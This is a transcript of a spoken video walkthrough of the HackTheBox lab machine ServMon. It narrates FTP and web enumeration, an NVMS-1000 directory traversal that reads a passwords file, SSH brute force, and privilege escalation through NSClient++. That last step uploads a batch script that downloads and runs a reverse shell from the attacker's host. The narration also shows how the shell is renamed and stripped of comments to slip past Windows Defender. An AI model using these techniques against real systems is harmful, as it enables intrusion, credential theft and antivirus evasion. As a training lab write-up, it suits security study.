Hey YouTube, what's going on? I'm Rocket, and welcome to my ServMon HackTheBox walkthrough. This box felt pretty OSCP-like because it required you to take a bunch of public exploits off the shelf and then run them. The thing is, running these exploits off the shelf sometimes would not work, and you therefore had to go through every step of the exploit manually and figure out why that didn't work as expected. Overall, the privilege escalation side was a bit tricky. You had to also take public exploits off the shelf and read them step by step. However, you did eventually have to go read the documentation and figure out how to use the web application like an admin would and try to get remote code execution that way, operating under false assumptions and nullifying them. Anyways, enough of me talking, let's get right. So the first thing I like to do is run nmap scan. So I'll enumerate all TCP ports with sudo nmap-p- and we'll output all formats with the -OA flag to nmap all TCP, and the host is servmon.hcb. I've already ran this, so let's check out the output below. Next, I like to copy all TCP ports so that I can edit this and delimit them with a comma. So here I'm just going to record a vim macro. Oops. Let's record it again. And then repeat that macro 100 times, and next I'm going to replace all new lines with a comma. Perfect. So now that we have our list of TCP ports that are listening on the host, we can run the same nmap command. So sudo nmap-p, provide the list of ports, -sc to run all default nmap scripts, -sv to enumerate all service versions, and -oa to output all formats to all TCP version. And the host is servmon.hcb. I've also already ran this command, so we'll check out the output below. So first we have an FTP server, which allows anonymous login. And it looks like there is a users directory, so this is definitely something worth investigating. Next we have OpenSSH for Windows, so that's indicating a Windows box. It's a little odd how SSH is on Windows, but I think with the more modern Windows operating systems, SSH might be becoming more common. Next we have a web server on port 80. We have RPC and NetBIOS, SMB, and I'm not sure what this is, and a bunch of other ports that I'm also not sure what they are. Next we also have a web server wrapped by TLS, which we should also investigate, which happens to be NSClient++. Alright, so let's start investigating the FTP server first. So I'll make a directory called FTP, go to it, and I'll just log in anonymously to servmon.hcb. So the name is anonymous if you are authenticating anonymously, and you don't need to provide a password. So we're logged in, we'll list what kind of directories we have, and we have the users directory. So let's see if we can get the users directory. Access is denied, so can we go into users? We can. And we have Nadine and Nathan. Can we get Nadine? Access is denied. Alright. Well, we'll go into Nadine first. And we see a confidential.txt, so let's grab this right here. So we'll go get confidential.txt. So we download it. Let's go to Nathan's directory, see if he has anything good. And he has notes to do, so let's get this as well. And I think you need to quote this because it has a couple spaces in it. Cannot find the file specified. Can we do it this way? Right, so let's escape the spaces with a /. Awesome. So next, I'm just going to make separate directories called Nadine and Nathan. I'm going to move confidential to Nadine, move notes to do to Nathan, just to stay organized. Let's check out what Nadine has for us. Confidential. So Nathan, I left your passwords.txt file on your desktop. Please remove this once you have edited it yourself and place it into the secure folder. Okay, so we know about a passwords.txt file on Nathan's desktop. Simple enough. Well, unless he moved it, of course, like he was asked to. So let's check out Nathan. Notes to do. Change the password for NVMS, complete. Lockdown NSClient access, complete. Upload the passwords. He hasn't uploaded the passwords, so he might still have that file on his desktop. Remove public access to NVMS. Huh. Okay. Remove the secret files place the secret files in SharePoint. Okay, so I think NVMS was the web application here. It should be, because there's something on port 80. But anyways, let's check out SMB before we go any forward, because SMB is a lot easier to enumerate than HTTP in my opinion. So we'll make a directory called SMB, go into it, and we'll try to access SMB with a null session. So smbclient-l to list all shares, and -n for a null session. Host is servmon.htb. Forgot a slash right there. And we failed to connect. That's weird. Anyways, you can also do it this way. So you can just say smbclient-l and then don't put any password, and that will also establish a SMB null session. So either way, we get access denied. All right, so looks like there's not much there. Let's try with NetBIOS. So I'll run rpcclient-u. Won't provide a user, and the host is servmon.htb. We also won't provide a password here, and we also get access denied. All right, so next let's enumerate the web service on port 80. If you remember, there was a web service on port 80 and 8443. So I'm going to make a directory called web80 just to stay organized. Go to it. And I'm going to open Firefox so we can navigate that. And I also have a Burp suite running in the background. So this way we also get passive enumeration of the web page. So this can help us discover URLs that are hidden if we were to go and check out the URLs from the web source manually. So http servmon.htb. We don't need to intercept. And it looks like we have a web application called NVMS 1000, which is probably what Nathan and Nadine were talking about. So let's try logging in. Admin, login. User password error. All right, let's check what kind of web service this is using. I like to use the Wapalizer Firefox web plugin because it quickly detects if your web server is using PHP or ASP.NET and what kind of web server is running as well. So there's probably a custom web server because Wapalizer didn't detect Apache or Nginx. We could also go check Burp suite for this. So if we went to the default web root, we'll notice that sending a default HTTP request, there's no server header right here. So anyways, we should be looking for the version in the source. So you can hit Control U on Firefox to find that, and then Control F, and we'll look for v version, and there's nothing there. Looking more carefully, we do see AV equals 2015-0323, which might indicate that the CSS and jQuery, so CSS and JavaScript, their version is very 2015-ish. So that might be an indicator of an outdated NVMS 1000. I can't say for sure, but chances are it's a good indicator. Anyways, let's check the exploit database to see if there are any known vulnerabilities against this application. So you can use searchsploit. Searchsploit is just a mirror of the exploit DB. And we'll search for NVMS-1000, and we get no results. So for those of you who are using a searchsploit, just be aware that sometimes providing a hyphen here being too strict with your search may yield in no results, so you can try loosening that up. Like in this case, I've just searched for NVMS, and you'll find something like directory traversal instead because there's no dash. Anyways, let's check out this exploit. And it looks like there's a directory traversal. This vulnerability was disclosed on December 2019. So if we just send a get to Windows WinINI given that this file exists, we should be able to get a directory traversal. Okay, so let's try doing that with Firefox. So instead of going to pages login, we'll send this right here. And we get nothing. But if we paid very close attention, we also noticed that our URL got truncated right here. So we can troubleshoot that by using our Burp proxy right here. So if we go to proxy, turn on the intercept, and then repeat this, we did not get our traversal right here. And of course, if we forward this, we're not going to get anything. So what can we do right there? Let's try doing that again. We'll just send this right here, because there's probably some JavaScript that's truncating the path anyways, either that or Firefox is doing that. And we're just gonna hit Control R to send to the repeater. And then we are going to paste the traversal, send it, and we get a result. Perfect. So when you're trying to run exploits for web or instructions, it's usually better to just use the scripts that they provide or do it manually in Burp. All right, so we know that we are able to read arbitrary files on the system. So given what we currently have, there were like some passwords that were on, I think, Nathan's desktop. So if we go back to the FTP directory, and you look at Nadine confidential, I left passwords.txt on your desktop, so we could check Nathan's desktop. So let's search for passwords.txt. And on Windows, I believe you go to this C users, and then Nathan desktop passwords. Let's give this a shot. And we get a list of passwords. Amazing. All right, so let's copy this. And we're gonna make a directory called loot. Go there. And just call this credentials.txt. Well, maybe we'll call it passwords. So we have a bunch of passwords, and we know that there are two users that exist on this host. Those are Nadine and Nathan. All right, so before we get too carried away, I like to continue with the enumeration phase and check what other check out the other web services that are on this host. So let's go back to our nmap scan up here. Like I said, I don't know what these ports here are, so I'm just going to ignore them for now. But this here looks interesting, so how about we check that out? So servmon.htb will go 8443. So it's using TLS. We will just accept this, and we are intercepting, so we don't want to do that. All right. And we have some NSClient++ application, which looks to be broken from a first glance. So I'm not going to look too deep into this right now, so I'm just going to close that. Maybe Burp would have a little bit more information on this, but yeah, nothing too interesting right there for now. So, but it's good to know that's running on the host. Last but not least, we have some passwords. So what do we do when we have passwords and SSH? Well, we try to use them to log in. So my favorite tool to brute force SSH is Hydra. So let's go to loot, and I should make a directory called users.txt as well, because we have Nadine and Nathan that we know of. So because we have so many passwords and two users, we want to try every single combination of username and password to log into this host. So to do that, we can run hydra -l to provide the list of users, and -p to provide the list of passwords. And I believe you say SSH, and the host is servmon.htb. Let's give that a try. And it looks like we have a hit. We have Nadine's password. So let's make a file called credentials.txt, so this way we don't have to run hydra every time to guess this username password combination. So Nadine, and that's her password. All right, so let's try logging into this box right now. So SSH Nadine at servmon.htb. And okay, that's the password. So put the password. And we have an SSH session. Amazing. So let's see if we can get the user's flag right here. So ls is not a recognized internal or external command. Probably because we were in DOS. So let's try running PowerShell. All right, so we're in a PowerShell session now. ls. Seems pretty slow. Let's go to the desktop. Do an ls, and we have the user flag right here. Perfect. All right, so now we need to figure out how to escalate our privileges to become system. So if we happen to be an administrator, we should already be system. So we can do that, check for that with the whoami command. So whoami/all. And it looks like we are not an admin of this host. Okay. We do have the ability to shut down the system, so if there are any services, we might want to try to restart them, but bear in mind that does kind of impact the stability of the system, so if you're on a real engagement, you might want to consult with your client to make sure that you are actually allowed to perform this disruptive operation. Anyways, let's see if we can find any good files here. So to do this, I like to run the get child item. GCI is shorthand for that, -rec for recurse, and EA is shorthand for error action, silently continue. I say we're using error action silently continue because we don't want our output filled with permission denied errors, because that becomes really hard to read. Oh, interesting. Cannot convert this. Okay, so I think maybe I need to actually specify capital letters right here. Okay. Never mind. Well, let's go GCI rec. Nothing there. And I should run it again because I was doing it from the desktop. So yeah, this looks a bit better. Okay. So we have a few shortcuts. Those aren't too interesting. We have camera roll pictures with no pictures in it. So there's nothing there. All right, let's go back up. We do have Nathan. Let's see if we can go in his directory. Permission denied. Okay. Nothing there. All right, so maybe we can check the operating system version. So we can go system info. We might find that this host is outdated and it might be vulnerable to a kernel exploit, but we get access denied. So at this point, I think it's just a bit more efficient to run some auto enumeration. Let's go to music instead, actually. And to do that, I like to run winPEAS. So if we go to tools and I go to privesc, privilege escalation awesome suite, find all executable files here. And this is probably a 64-bit host. Let's check with PowerShell, so we can go env and then say processor architecture. And we are on a 64-bit host. So let's go to this directory right here and spin up a web server so we can get the ServMon host to download this file. So we'll run python 3-m http.server. So it's listing on port 8000, and we can download this file with the new object system.net.webclient.download file, and we'll specify the file from the remote URL. In this case, our host is 10.10.14.48. I can show you that right here. So IPASTUN0. this is my HackTheBox IP address. So that's why we're providing that right there. On port 8000. And we want to get winPEAS.exe. And for those of you who don't know, Linux web servers are case sensitive when it comes to web paths. So keep that in mind. Next, we need to specify the directory where we're going to download that in. In this case, it is C users Nadine music. And we're just going to call it winPEAS.exe. So we'll do that. Wait a little bit. And we finally get a hit. So we were able to download the file. And if we do an ls, it is there. So let's run it. winPEAS.exe. Great. So it looks like it's finished running. Let's check out the output above. So I think it was winPEAS.exe. That's what we executed. /. And this is just to go to the very top where we originally downloaded and ran this file. So I like winPEAS because it colors all privilege escalation vectors that are meaningful and non-meaningful. So for example, those that are highlighted in red, you should definitely take a look at. Those that are highlighted in green means that that configuration is probably configured securely. So you can pretty much glance over it relatively quickly. So PowerShell version, not too interesting. Lapse is not installed, also not too interesting. Keep going down. Still don't see anything too good here. We already know that we are Nadine. Nothing there. We weren't able to enumerate for AV information, which is kind of interesting. So we might want to enumerate for antivirus manually. UAC status. Looks like UAC policies are disabled, which is kind of interesting. Any local account can be used for lateral movement. That's definitely not good for the host. We don't have admin equivalent privileges. We checked that manually earlier. We know what our privileges are. I know, like I mentioned earlier, the SC shutdown privilege, we might be able to abuse that to restart the system if we can modify any writable service file. We found some auto login credentials. These are really partially found because it didn't really tell us the password. It just told us default domain name and username without a password, so not too useful for us. All folders found. We enumerated for that manually earlier. Looking for interesting processes for memory dump. If you can overwrite some binary. Nothing there. See if we can overwrite some binary or provide DLL hijacking for unquoted paths. I don't see any unquoted paths that have spaces in them. But we do have some drivers installed, so that might be kind of interesting. Kind of low on the list though. So we'll just keep that in mind. This here looks suspicious. NSClient++ service run. And if we remembered our nmap scan from earlier, that web application listening on port 8443 was NSClient++. And that's definitely a custom installation that is specific to this box. So that is pretty high on the list for me. And I can show just so you guys can remember. We'll go all TCP version.nmap here. And we were able to fingerprint that this web service was indeed NSClient++. So, oops, NSClient++. There we go. All right. It also has autoload privileges, yeah, it has autoload privileges. So that means if you restart this service, it should be able to restart as soon as you reboot the machine. And we do happen to have the SC shutdown privilege, which should let us reboot the system. Okay. SSHD is also autoload, so if SSHD is outdated and has any vulnerabilities, we might be able to exploit that as well, maybe. Some VMware stuff. Pretty standard for virtual machines. We are not able to modify any services though, so maybe rebooting might not be an option. And here's the directory for NSClient++. I'm just gonna copy this because we do want to go check that out. And yeah, there is Windows Defender, so our little message talking about antivirus saying, hey, no AV was detected, well, I'm pretty sure there is because we have Windows Defender installed. So that's also good to keep in mind. Let's see. No network share access. Don't see anything there. Any new ports? So winPEAS, it always highlights the local host IP address because during an nmap scan from outside the box, you wouldn't have seen these ports right here. So 1900 looks suspicious. The rest I'm not too interested in because they're in the ephemeral port range. So they're usually like RPC listening ports for custom services. Implementation details. So the domain firewall is enabled, public false. That makes sense because most Windows hosts do not allow most of these ports to be accessible by default. So that's why these two are disabled. And SMB was found here. I've seen this multiple times. It usually seems to be a false positive in my book, so I'm just putting it on the bottom of the list. You could check out this URL if you want to learn more about this though. Moving down, we don't have anything else. All right, so let's go to, let's go to that directory in this client++. Let's quote this, ls, and here we might check for the configuration files because that might have the web credentials for the service, and we might be able to escalate our privileges on this using this application. So we did notice earlier in our winPEAS scan that the NSClient++ is a service. So services normally run as system on the host, and that means they're also good candidates to exploit, to escalate your privileges. So if we can get remote code execution on behalf of NSClient++, then we should have system privileges on this box. So we could check the changelog first to see the version. So changelog.txt. So by the way, GC means get content. That's a lot of information. Let's go to the very top. Oops. So we're gonna take note, the last fix made was in 2018 here. So we can take note of that. Make a directory called privesc. Go to it, and I'm just gonna call this notes.txt. So NSClient date is that. Okay. So next, let's see if there's a configuration file that has passwords or credentials in it. So usually on Windows, configuration files are INI files. I mean, here it is right here, but you could be a bit more thorough and do a GCI-RAC for recurse, and then do a -F5 shorthand for filter, and start INI if you want to find all INI files right here. So you have boot and NSClient. So let's check out boot, and then we'll check out NSClient.ini. So nothing there. Let's check out NSClient.ini. So here, right off the bat, we have a password here. So I'm gonna take note of this immediately. So let's call this, go to our root directory, go edit our credentials, and we'll say NSClient++ is this guy right here. Cool. All right, so that's interesting. Let's see if we can log into the NSClient web application. If we remembered, we tried going in with logging into that, like there was no login prompt for that web application, and this was kind of a part that kind of confused me a little bit when I was doing this box originally. So going back there, go https servmon.htb port 8443, and there's no login page right here. Oh wait, there it is. So previously this wasn't there. So if we provide the password, sign in, it gives us you're not allowed. I know for a fact that you can just use Chrome because there is some sort of, like, there's something that Firefox doesn't like about the NSClient++ web application. So I'm actually just going to be using Chromium from here. So I guess the lesson learned is if something doesn't work, like if one web browser doesn't really display something, it's always a good idea to try a different one. It's fine. Let's go back, go to ServMon HACTB, and here if we reload the page, we always get prompted with the login. So kind of odd, kind of unfortunate. It's not a situation that you run into usually, but just be aware that it's something that's more with one browser, just try it with the other. Anyways, let's try to log into this page with Chrome. You are not allowed. So does this mean we have the wrong password? Well, let's go back and read the configuration a bit more carefully. So here we have the allowed hosts. So the only allowed host is 127.0.0.1. That could possibly explain why we're getting the not allowed error. We also try the forgot password, and we could try resetting the password here and fall into this rabbit hole, but let's try to access this web service from localhost, and we can do that using local port forwarding since this host has SSH. If this host didn't have SSH, we could use a tool like Chisel to local port forward, but it's a lot easier to do with SSH, and we also don't leave a Chisel artifact behind. So how about we do that, since we already have SSH access to the box. So let's copy Nadine's password. I'm just going to open up a new tmux pane here. I'm just going to call it tunnel. So this is going to be the SSH tunnel. And we can do this with the SSH-n because we don't want to run any commands. We just want to open up a tunnel. -L to do local port forwarding. And we're going to port forward our local host 8443. And we're going to map that to 127.0.0.1 port 8443 on the remote host. So basically what this means is if we connect to port 8443 on our local machine, that is the equivalent of accessing port 443 from localhost from the web application's point of view. So username is Nadine at servmon.htb. Let's give the password, and we should have our tunnel up. We can verify this by running netstat antp, and we'll notice we are now listening. We now have a port on localhost, which is 8443. So going back to Chrome, instead of going to servmon.htb, we can go to https 127.0.0.1, and it should give us the same result, but this time instead of accessing this service over the internet, we're accessing it over our tunnel. So let's get the password again, get the NSClient++ password, and log in. And we're in. Perfect. So the password wasn't changed. So when you get a forbidden, always make sure to carefully read the configuration for any application-based firewalls that are part of the app. So let's see if we can go to the console and maybe run some commands. So maybe let's try whoami and try running this. Command not available. What commands do we have? It looks like all these commands here look like custom NSClient++ commands. And this looks like some sort of monitoring application. So we might be able to give it an external script. So in this case, we have default. This is the default script. and we also have a scheduler. So at this point, it'd probably be a good idea to do some research on the application to figure out how to use and run it. It might also be a good idea to check the exploit database to see what kind of public exploits might be available for this. That could help us quickly get remote code execution. So searchsploit, NSClient, and we do have a version. We have authenticated remote code execution, which is pretty much what we're looking for. We also have privilege escalation, so maybe let's take a look at this first. So searchsploit-x. This, we do see a certain version, and when NSClient++ is installed with web server enabled, local low privilege users may have the ability to read the admin's password in plain text, which is what we did. Since NSClient++ service runs as a local system, we can get system privileges basically if we execute code on its behalf. So while I did this box, this here was, I tried following the commands here, and there was a gotcha. So you could try following these commands here, but the problem is you need to restart the computer. So the question is, can you even restart the computer? And you might be able to try that with restart computer commandlet. And we have access denied, which is interesting because we do have the SE shutdown privilege. So I'm gonna have to read up on that again, because I'm not sure what happened there. So just so you know, it doesn't, before proceeding with that, do read all the exploit code. That's a good lesson learned, because the last step will not work, and you would should have went through all these steps by yourself for no reason. So always read the exploit code. Great. So how do we actually do this? So let's, our goal is we want to get remote code execution on behalf of NSClient++, and we should be able to do that if we upload a script and run it. So I'm going to go to the documentation for this. So I'm going to switch over to the browser. I'm going to look for NSClient++ documentation. Go here. And maybe let's look for anything that's related to scripts. Scripts. And I think adding a script would be good because we need to do that first. So we should be able to call the put API, and this should be able to upload new script definitions. Okay. So we can upload a batch file, which looks interesting. So upload check bat. Okay. Our response should verify that it was added. You can use this curl call to add it. So how about we take this, and we're going to write a script to do this. So let's go back to our Kali machine. Let's go to the privs directory, because that's what we're trying to do. I'm just going to call this exploit.sh. So put the shebang. So our username is admin as far as I know. Okay. So put local, instead of localhost, let's put 127.0.0.1 just to be sure. These scripts, check new.bat. So we would need a check new.bat script. Okay. Let's go back to the documentation. Configuration added to a script is then this right here. Okay, delete script. We don't need to worry about, well, deleting a script is handy for like real world engagements, but in this case we're just doing hack the box, so we're not going to worry too much about this right here. So the next thing is we might need to run this. So anyways, let's try uploading an example script. So this is a batch file. The question is, does it support PowerShell? Because if we can upload a PowerShell script, then we might be able to get remote, we might be able to get a reverse shell that way. So let's go back to the Kali machine. And maybe let's try with the batch file first, then with the PowerShell, and then we'll try getting remote shell with PowerShell. So we'll call this check new. We'll just call this rocket check new in case there are other people on the host. Try going through this same methodology, because when you have multiple players on the same host with the same methodologies, you can conflict and you might get false positives when uploading this file, tricking you, telling you that you didn't upload a file when you actually did. So, all right, let's see if this works. Well, first we need to create this file, rocket check new.bat. So let's edit this and just go echo something like rocket was here. All right, make the exploit script executable. And let's run it. Actually, before we run it, I kind of want to use verbose so I can debug what's going on in case something goes bad. Let's run exploit. Enter the host password for admin. Okay. What is your password? This is your password. Paste. Upload completely sent off. Added rocket check new scripts rocket check new.bat. So we might be able to find this file on the server if we go back to our session over here. So let's go GCI recurse, and we're going to filter to see if we can't find our file. So looks like our script was successfully added. Can we get the contents of it? Let's see. Rocket check new.bat. Echo rocket was here. Okay, so let's see if we can't execute this using the web interface. Let's go to console. Ah, amazing. Rocket check new. So let's try running the rocket check new command. Run. Duplicate command. I'm not sure if that gave us an error or not. Duplicate command for rocket check new. Okay, well, I think at this point it is handy to just go back to the documentation and figure out how to run a script. So here it said the configuration added to the external script is this. So maybe we might be able to check our configuration script back on the host and see if our little example was actually added. So let's do a GCI rec. We're gonna find all INI files again. So I forget what it was called. Yeah, we want to look at NSClient.ini. So let's get these contents right here. And see if the rocket script was added. Here it was. So external scripts. A script, this is a list of scripts available to run from the check external scripts module. Check rocket new.bat. Okay. So I'm not sure if it actually did execute, because sometimes applications that print console output it will not actually display it on this web interface here. So maybe instead of running an echo command, we could upload a ping batch script instead and try executing that. So let's copy this. We'll just call it rocket ping.bat. Edit it, ping. So say ping. Oh wait, sorry, I just glanced over the documentation quickly again. So here, this used at echo and at exit 0, whereas our little command on our Kali machine it did not, it was just echo rocket was here. So yeah, that's interesting. Anyways, we'll just try using the ping command instead. And ping ping n for Windows. So 1, 10, 10, 14, 48. Okay. Before we do that, let's check that we can actually ping our host from this session right here, because if there's a firewall, then we would get false positives when trying to get remote code execution this way. So 10, 10, 14, 48. And it looks like we should be allowed to do this. Good. So it should be a viable upload. Let's modify the exploit script. We just call this rocket ping.bat. Ping.bat. And let's upload this. I need to know the password again. Where are you? Here you are. Let's go back here. Paste. And we added the script. Okay, so let's see what this says. Duplicate command for rocket ping. We do need a listener, so go sudo tcp dump -i for interface. In this case, our VPN interface is ton0, and we want to capture all ICMP traffic because that's what pings use the ICMP protocol. All right, let's try refreshing this page. And we have to log in again. Let's put the password in. Let's see, duplicate command for rocket ping. Interesting. All right, rocket ping, run. Do we get something? And we got pinged. So we have remote code execution. Amazing. Let's try that again. See if we get another ping. Rocket ping, run. We get another ping. That's great. Okay, so we have verified the assumption that we are able to get remote code execution using batch files. The question is, can we get remote code execution using PowerShell files? So let's copy rocket ping.bat. Well, actually, before we do this, maybe we can go into the scripts directory and look what other scripts they have. In this case, they have PowerShell.ps1, and this might give us an example for how we might want to create a PowerShell script. So gc PowerShell.ps1, right host, everything is not going to be fine, exit 4. So we should probably have an exit 0, because 0 is usually a status code that is positive. So for example, if we gc the check.ok.bat, it should probably have exit 0, which it does. So everything is going to be fine, exit 0. Everything is not going to be fine, exit 4. Okay. So how about we start doing that? So we'll call this copy rocket ping. We'll just call it rocket ping _ps. If you're wondering why I'm calling it ps when we already know it's a PowerShell file, that's because when we're trying to run the command here, it looks for the name before the extension. So that's a little detail there. So we'll copy rocket ping.bat as rocket ping ps1, and we'll also edit rocket ping ps.ps1. We do want to exit with 0. Actually, yeah, because right host is a PowerShell commandlet, so pinging rocket and ping n1. Okay, cool. Let's see if this works. Let's modify our exploit.sh file. It's the rocket ping.bat, rocket ping ps.ps1, data binary rocket ping ps.ps1. All right, let's upload it. We need the password. Let's get the password again. It's right here. Paste it, and we have uploaded. Okay, so let's listen for pings again. And let's try executing the rocket ping ps command. Run. It did not work. Oh no. Why did it not work? It did not ping us. Rocket ping ps. Odd. Okay. Anyways. Maybe let's try downloading something over HTTP just for fun. So let's try echo test to test.txt, and instead of rocket ping, we'll just call this rocket download.ps1, because basically what I want to do is download a reverse shell and then execute it. So for now, let's just try seeing if any PowerShell commands do execute, because it's difficult to see with the right host command, because that's not really giving us any visual feedback. So we'll just call this rocket download ps.ps1. Rocket download ps.ps1. We won't do any write host commands. We'll just do something like new object system.net.webclient.download string. Well, yeah. And let's just put our IP address, P.48, port 8000, test.txt. I think that's what it was, right? Test.txt. Okay. Let's see if this works. So we're going to modify exploit. Remove this right here. And we're going to execute our PowerShell file instead. Okay. Let's upload it. So we added it. Let's spin up an HTTP server. So Python 3.m http.server. And we should try running the rocket download ps script. Do this, run. And we didn't get anything. Based off these experiments here, it looks like it doesn't really like PowerShell in that sense. So what if we tried invoking PowerShell from a batch file instead? Let's try rocket invoke ps.bat. So, and maybe we'll put at everything. So exit 0. I'll say PowerShell - command ping. Well, actually, new object system.net.webclient.download string. Maybe put this in double quotes instead. Let's go back here, put another double quote. HTTP 10.10.14.48 port 8000, file was test.txt. Okay. Cool. So yeah, this is the one we wanted. So let's modify this code again. Paste this. And we'll try uploading a batch file that will invoke PowerShell instead. Let's try that. All right, so since that didn't work, we should also verify that we can indeed execute that command and it will work on the host itself. So let's try this. And I did put the at PowerShell, so maybe it didn't like that. So let's try modifying this. Well, actually, let's just try running something like this. Python HTTP server, just make sure the command syntax is right. Do you do anything? Yes, you do. So that works. Okay. So the PowerShell commandlet is clearly right. It may just not like the @ symbol right here, so must have made a minor mistake right there. No big worries. Let's copy this. Well, actually, rocket invoke ps.bat, remove this, and I wonder if we can just re-upload this. I'm curious now. Let's just run the exploit sh again, and we're gonna copy the password for probably the 10th time. Upload it. Before we run this, let's make sure that it actually got changed. So gc rocket invoke ps.bat, it changed it. Amazing. All right, so let's spin up our HTTP server again, and let's try running it. Rocket invoke ps. Run. Okay, that looks promising. And we have remote code execution. Amazing. Cool, so now we should be able to invoke our PowerShell reverse shell. Before we do that, if we remember during our enumeration phase, we noticed that there's potentially Windows Defender installed on this system, so we might be able to run the get service commandlet. And apparently we don't have enough privileges to check that. But we can run get process. And I think one of these processes does indicate Windows Defender. Let's just check that on Google immediately. Let's go back to our browser. So, Windows Defender process. Okay, so this program is known as msmbclient.exe. Let's go back here, see if we can find that. And there it is. So we definitely have antivirus running on this system. And when you have Windows Defender running on a modern Windows operating system, usually they're going to block the reverse shell that I am about to use. So we're going to do some custom modifications to it before we get it to download it. So I'm going to copy this web shell here. I think it's in Tools, Nishang. I think it's called Shells. And if you're unfamiliar, you can go and download the Nishang framework from GitHub right here. You can clone it, and the shell that I'm about to use is in the shells directory right here. But I already have this cloned on my Kali machine, so I'm just kind of skipping that step. So it's called invoke PowerShell TCP.ps1. I'm just going to call this rocket rsh.ps1. And I'm going to modify it. And this is how you bypass antivirus on Windows using this script. So instead of calling invoke PowerShell TCP, just call it something like pwn. Replace this for all occurrences. And then you're going to want to delete all comments. I'm going to delete most comments because I do want to end up calling the function, because we're going to execute this script in memory, which will load the declaration, and then we need to execute it. So I'm just going to copy this down here, paste that at the bottom, and then finally remove all comments. Amazing. Okay, so Oh, and don't forget to configure it properly because we want the reverse shell to connect back to our IP address on a port of our choice. So our IP address is 10.10.14.48. I like to go on port 2001. So next we need to create a batch file that will invoke a PowerShell script that will actually download and execute our reverse shell. So in this case, it was, I think, rocket invoke ps.bat. So let's just go modify this. We know for a fact that this worked previously, but instead of downloading test.txt, we want to download and execute rocket rsh.ps1. And we also need to provide the IEX in front here so we can actually execute this string that we downloaded in memory. Cool. So oh, by the way, this was just a mistake that I made previously. You can ignore that. It's called rocket invoke ps.bat because we are going to invoke PowerShell. So we're going to change that script and we're going to run the exploit sh again. And we're going to copy this. Upload it. Let's see if it's on the server. ls. You see rocket invoke ps.bat. It worked. Okay, cool. So next we need to spin up a netcat listener and an HTTP server. So we'll spin up the netcat listener, rlwrap, ncat nvlp, so we can listen on port 2001. I'm using rlwrap, so when I do get a reverse shell, I can move my cursor left and right and go back recursively in history, which is very handy. And then I also need to spin up a HTTP server because this command right here, rocket invoke ps.bat, is going to go download and execute this PowerShell reverse shell from my Kali machine, which should grant me the reverse shell. So python 3-m http.server, it's on port 8000. Let's see if we can get this file. And let's execute rocket invoke ps. Rocket invoke ps. Run. So we managed to get the file and execute it, and we have a reverse shell. So the question is, are we system? Who am I? And it looks like we are system. Perfect. So let's see if we can go to the administrator directory. cdc users administrator and desktop, ls, and there's a flag. So that's going to be a wrap up for this video. I hope you learned something new, and I will see you in the next video.